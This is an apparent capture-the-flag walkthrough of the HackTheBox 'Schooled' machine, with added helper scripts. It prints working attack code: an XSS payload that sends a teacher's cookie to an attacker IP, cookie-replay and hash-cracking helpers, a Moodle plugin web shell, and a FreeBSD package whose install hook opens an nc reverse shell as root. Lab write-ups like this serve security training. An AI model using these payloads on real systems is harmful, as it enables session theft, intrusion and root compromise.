
Hackthebox Schooled walkthrough

Schooled

Summary :

  • 1 - Stealing the teacher's cookie with XSS
  • 2 - Privilege escalation using a CVE
  • 3 - Getting RCE
  • 4 - Database enumeration
  • 5 - Password cracking
  • 6 - Creating a malicious pkg

    Scanning phase :

    Not shown: 998 closed ports  
     PORT  STATE SERVICE VERSION  
     22/tcp open ssh   OpenSSH 7.9 (FreeBSD 20200214; protocol 2.0)  
     | ssh-hostkey:   
     |  2048 1d:69:83:78:fc:91:f8:19:c8:75:a7:1e:76:45:05:dc (RSA)  
     |  256 e9:b2:d2:23:9d:cf:0e:63:e0:6d:b9:b1:a6:86:93:38 (ECDSA)  
     |_ 256 7f:51:88:f7:3c:dd:77:5e:ba:25:4d:4c:09:25:ea:1f (ED25519)  
     80/tcp open http  Apache httpd 2.4.46 ((FreeBSD) PHP/7.4.15)  
     |_http-favicon: Unknown favicon MD5: 460AF0375ECB7C08C3AE0B6E0B82D717  
     | http-methods:   
     |  Supported Methods: GET POST OPTIONS HEAD TRACE  
     |_ Potentially risky methods: TRACE  
     |_http-server-header: Apache/2.4.46 (FreeBSD) PHP/7.4.15  
     |_http-title: Schooled - A new kind of educational institute  
     No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
    

    We found two open ports: 22 (SSH) and 80 (HTTP). Both banners say FreeBSD, which matters later: binaries from ports live under /usr/local and software is managed with pkg.

    So what should we do here?

    1 - Search for an exploit for the running services.
    2 - Check the website and see what we can find.

    Enumeration :

    [screenshot: web]

    I started checking the application and nothing on it was interactive; the only thing I found was a contact list.

    [screenshot: contact-list]

    I saw admissions@schooled.htb, which made me suspicious, so I tried admissions.schooled.htb as a subdomain, but it did not work.

    Now I will check whether there is another subdomain by fuzzing the Host header with ffuf.

    ffuf -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://schooled.htb/ -H 'Host: FUZZ.schooled.htb'  
         /'___\ /'___\      /'___\      
         /\ \__/ /\ \__/ __ __ /\ \__/      
         \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\     
         \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/     
          \ \_\  \ \_\ \ \____/ \ \_\      
          \/_/  \/_/  \/___/  \/_/      
         v1.2.0-git  
     ________________________________________________  
      :: Method      : GET  
      :: URL       : http://schooled.htb/  
      :: Wordlist     : FUZZ: /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt  
      :: Header      : Host: FUZZ.schooled.htb  
      :: Follow redirects : false  
      :: Calibration   : false  
      :: Timeout     : 10  
      :: Threads     : 40  
      :: Matcher     : Response status: 200,204,301,302,307,401,403  
     ________________________________________________  
     moodle         [Status: 200, Size: 84, Words: 5, Lines: 2]  
    

    [screenshot: boom]

    There is our subdomain: moodle.schooled.htb (add it to /etc/hosts next to schooled.htb before browsing to it).

    [screenshot: login]

    Now let's check if we can create an account.

    [screenshot: Creating-an-account]

    [screenshot: account]

    Self-registration only accepts email addresses of the form name@student.schooled.htb.

    [screenshot: logged-in]

    After some searching I found CVE-2020-14321, a recent Moodle vulnerability: a user holding the teacher role in a course can enrol users into that course with the manager role, because the role ID in the enrol request is not checked against what a teacher may assign, and from there reach site-wide manager privileges through "Log in as". It fits this box.

    So if you read the CVE you understand that I first need the teacher role to use it.

    After a while I found that the only course I can enrol in is the Math course.

    [screenshot: Math]

    I read the announcements and found this.

    [screenshot: hint]

    So the teacher checks the students' MoodleNet profile field, which means he will render whatever we put there in his own browser.

    The first thing that came to mind was using XSS in that field to steal his session cookie, so let's try it. Start a listener on port 8000 on the attacking machine (for example python3 -m http.server 8000) and save the payload as the MoodleNet profile value.

    Payload : <img src=x onerror=this.src='http://10.10.x.x:8000/?'+document.cookie;>

    [screenshot: xss]

    [screenshot: server]

    [screenshot: wow]

    The callback carries the teacher's MoodleSession cookie; replace our own cookie value with it in the browser (or in Burp) and reload.

    [screenshot: session-hijacking1]

    Now we are Manuel Phillips.
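The cookie arrives percent-encoded in the listener's access log, so it is worth having a small helper to pull it out and turn it into a replay command. This is an added example, not code from the original post: it assumes the listener was python3 -m http.server (whose log line format it parses) and the IP address, timestamp and cookie values in SAMPLE_LOG are constructed sample data.

```shell
#!/bin/sh
# Added example (not from the original post): extract the exfiltrated cookie
# from the access log of the listener that received the XSS callback.
# Assumes the listener was `python3 -m http.server 8000`; its log lines look like
#   10.10.10.234 - - [05/Apr/2021 12:00:00] "GET /?MoodleSession=abc HTTP/1.1" 200 -
# The IP, timestamp and cookie values below are constructed sample data.

# Undo the percent-escapes a browser applies when document.cookie
# (e.g. "a=b; c=d") is appended to an image URL.
urldecode() {
    sed -e 's/%20/ /g' -e 's/%3B/;/g' -e 's/%3b/;/g' \
        -e 's/%3D/=/g' -e 's/%3d/=/g' -e 's/%2C/,/g'
}

# Read http.server log lines on stdin, print one decoded cookie string per
# callback hit (requests for other paths, e.g. /favicon.ico, are ignored).
cookie_from_log() {
    grep -o 'GET /?[^ ]*' | sed -e 's#^GET /?##' | urldecode
}

# Build the curl command that replays the stolen session against a URL.
replay_cmd() {
    # $1 = cookie string, $2 = target URL
    printf "curl -s -b '%s' '%s'\n" "$1" "$2"
}

# Constructed sample log: one callback hit plus an unrelated favicon request.
SAMPLE_LOG='10.10.10.234 - - [05/Apr/2021 12:00:00] "GET /?MoodleSession=abcdef0123456789%3B%20MOODLEID1_=deadbeef HTTP/1.1" 200 -
10.10.10.234 - - [05/Apr/2021 12:00:01] "GET /favicon.ico HTTP/1.1" 404 -'

if [ "${1:-}" = "demo" ]; then
    printf '%s\n' "$SAMPLE_LOG" | cookie_from_log | while read -r c; do
        replay_cmd "$c" "http://moodle.schooled.htb/moodle/my/"
    done
fi
```

Usage: `sh cookie.sh demo` prints the curl line for the sample log; in a real run pipe the listener's output into cookie_from_log instead. The decoder only handles the escapes a cookie string normally contains; a value with other encoded characters would need a fuller decoder.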

    The next step is to enrol a user into the course, intercept the request, change the role ID to 1 (the manager role) and the user ID to our ID. This lets us use "Log in as" on the user we added from the participants list. The user must be one who already holds the site manager role, which here is Lianne Carter.

    Let’s do it !

    [screenshot: intercept-id]

    Now look at the left panel.

    [screenshot: administration]

    We have Site administration now.

    To get RCE we have to install a custom plugin, but the manager role as defined on this site is not allowed to do that, so we first have to edit the role.

    Go to Users > Define Roles > Manager > Edit, save the form, intercept the request and replace its body with the one from the GitHub exploit for this CVE, which turns on the capabilities needed to install plugins.

    [screenshot: change-role]

    Now we can install a plugin.

    [screenshot: plugin]

    Just follow the Moodle RCE steps of that exploit (upload its plugin zip) and trigger the web shell at "domain/blocks/rce/lang/en/block_rce.php?cmd=id".

    [screenshot: rce1]

    Foothold :

    We got our shell!

    [screenshot: shell]

    After some enumeration I found the Moodle database configuration file (config.php holds the database user and password).

    [screenshot: DB]

    When I tried to run mysql the OS could not find it, because /usr/local/bin (the FreeBSD ports prefix) is not in this shell's PATH; I found it there and used it to dump the mdl_user table. Let's get the creds!

    [screenshot: creds]

    Now let's crack the hash. Moodle stores bcrypt hashes ($2y$), so use hashcat mode 3200 or john's bcrypt format with rockyou.

    [screenshot: crack]
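The mysql client's tab-separated output is not what the crackers want, and Moodle rows for externally authenticated users carry "not cached" instead of a hash. This added example (not from the original post) filters such a dump down to username:hash lines and prints the matching hashcat command; the SAMPLE_DUMP rows are constructed and the hashes in them are not real bcrypt values from the box.

```shell
#!/bin/sh
# Added example (not part of the original post): turn the output of
#   mysql -u moodle -p -e 'SELECT username,password FROM mdl_user' moodle
# into a username:hash file for hashcat/john, keeping only bcrypt rows.
# Moodle stores bcrypt ($2y$) hashes; hashcat mode 3200 cracks them.
# SAMPLE_DUMP is constructed sample data, not real hashes from the box.

SAMPLE_DUMP=$(printf 'username\tpassword\nadmin\t$2y$10$abcdefghijklmnopqrstuvABCDEFGHIJKLMNOPQRSTUVWXYZ01234\njamie\t$2y$10$abcdefghijklmnopqrstuvABCDEFGHIJKLMNOPQRSTUVWXYZ56789\nguest\tnot cached\n')

# stdin: tab-separated mysql output with a header row.
# stdout: user:hash for every row whose password column is a bcrypt hash.
bcrypt_rows() {
    awk -F'\t' 'NR > 1 && $2 ~ /^\$2[aby]\$/ { print $1 ":" $2 }'
}

# Command line to crack the file bcrypt_rows produced.
crack_cmd() {
    # $1 = hash file, $2 = wordlist
    printf 'hashcat -m 3200 --username %s %s\n' "$1" "$2"
}

if [ "${1:-}" = "demo" ]; then
    printf '%s\n' "$SAMPLE_DUMP" | bcrypt_rows > hashes.txt
    crack_cmd hashes.txt /usr/share/wordlists/rockyou.txt
fi
```

Usage: pipe the real mysql output into bcrypt_rows; the --username flag keeps the user names out of the hash input while still showing which account each cracked password belongs to.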

    User Flag :

    jamie's password = !QAZ2wsx

    Let's grab our SSH session as jamie.

    [screenshot: sssh1]

    Privilege escalation :

    After running sudo -l, we see that jamie can run pkg install as root without a password.

    [screenshot: sudo]

    I found this reference for creating a pkg: http://lastsummer.de/creating-custom-packages-on-freebsd/. The point is that pkg runs a package's +PRE_INSTALL and +POST_INSTALL scripts as root during installation, so a package we build ourselves executes whatever we put in those scripts.

    Script for getting root :

     #!/bin/sh  
     # staging directory holding the package metadata and hook scripts  
     STAGEDIR=/tmp/package  
     rm -rf ${STAGEDIR}  
     mkdir -p ${STAGEDIR}  
     # +PRE_INSTALL runs as root before the package files are laid down:  
     # spawn a reverse shell back to our listener on port 9080  
     cat >> ${STAGEDIR}/+PRE_INSTALL <<EOF  
     echo "Resetting root shell"  
     rm /tmp/a;mkfifo /tmp/a;cat /tmp/a|/bin/sh -i 2>&1|nc 10.10.x.x 9080 >/tmp/a  
     EOF  
     # +POST_INSTALL runs as root after installation  
     cat >> ${STAGEDIR}/+POST_INSTALL <<EOF  
     echo "Registering root shell"  
     pw usermod -n root -s /bin/sh  
     EOF  
     # minimal manifest pkg needs in order to accept the package  
     cat >> ${STAGEDIR}/+MANIFEST <<EOF  
     name: mypackage  
     version: "1.0_5"  
     origin: sysutils/mypackage  
     comment: "automates stuff"  
     desc: "automates tasks which can also be undone later"  
     maintainer: john@doe.it  
     www: https://doe.it  
     prefix: /  
     EOF  
     # build the package into the current directory  
     pkg create -m ${STAGEDIR}/ -r ${STAGEDIR}/ -o .  
    

    This script, run on the box, creates a .txz package in the current directory.

    [screenshot: txs]

    Root flag :

    1 - Set up a listener on your machine on the port used in +PRE_INSTALL (for example nc -lvnp 9080).
    2 - Run "sudo pkg install --no-repo-update *.txz". The install blocks while the reverse shell from +PRE_INSTALL is connected; that is expected, and the shell on the listener runs as root.

    [screenshot: root]
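The same technique in reusable form, together with the check you would run before installing any third-party package with sudo: list and print its install hooks. This is an added example, not the post's own script. It reuses the post's manifest values, takes the hook command as a parameter, and where pkg is not installed (any non-FreeBSD host) falls back to a plain tar archive purely so the audit step can be exercised; that tarball is not a valid package, a real one must be built with pkg create.

```shell
#!/bin/sh
# Added example, not the original post's script: build the staging directory
# for a hook-carrying FreeBSD package from a single command, and audit any
# package archive for install hooks before running `sudo pkg install` on it.
# Package name, version and the hook command are illustrative assumptions.

# Write +MANIFEST and +PRE_INSTALL into $1 so pkg runs $2 as root on install.
build_stage() {
    stage=$1; cmd=$2
    rm -rf "$stage" && mkdir -p "$stage"
    printf '%s\n' "$cmd" > "$stage/+PRE_INSTALL"
    cat > "$stage/+MANIFEST" <<'EOF'
name: mypackage
version: "1.0_5"
origin: sysutils/mypackage
comment: "automates stuff"
desc: "automates tasks which can also be undone later"
maintainer: john@doe.it
www: https://doe.it
prefix: /
EOF
}

# Build the archive into directory $2. On FreeBSD this is `pkg create`; on
# other hosts fall back to a plain gzip tar so list_hooks can be demonstrated
# (that tarball is NOT installable by pkg; only pkg create makes a real one).
pack_stage() {
    stage=$1; out=$2
    if command -v pkg >/dev/null 2>&1; then
        pkg create -m "$stage" -r "$stage" -o "$out"
    else
        tar -czf "$out/mypackage-1.0_5.tgz" -C "$stage" +MANIFEST +PRE_INSTALL
    fi
}

# List the hook scripts inside a package archive and print their contents.
# This is the check worth doing before `sudo pkg install` of anything you
# did not build yourself: the hooks run as root.
list_hooks() {
    pkg=$1
    for h in $(tar -tf "$pkg" | grep -E '^\+(PRE|POST)_(INSTALL|DEINSTALL)$'); do
        printf '== %s ==\n' "$h"
        tar -xOf "$pkg" "$h"
    done
}

if [ "${1:-}" = "demo" ]; then
    build_stage /tmp/package 'id > /tmp/hook_ran_as'
    mkdir -p /tmp/pkgout && pack_stage /tmp/package /tmp/pkgout
    list_hooks /tmp/pkgout/mypackage-1.0_5.*
fi
```

On the box itself, replace the hook command with the reverse shell from the post's script and run `sudo pkg install --no-repo-update` on the .txz that pkg create produced. On the defensive side, a sudo rule that allows `pkg install` with a wildcard is equivalent to unrestricted root for exactly the reason list_hooks shows.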

    montana

  • This post is licensed under CC BY 4.0 by the author.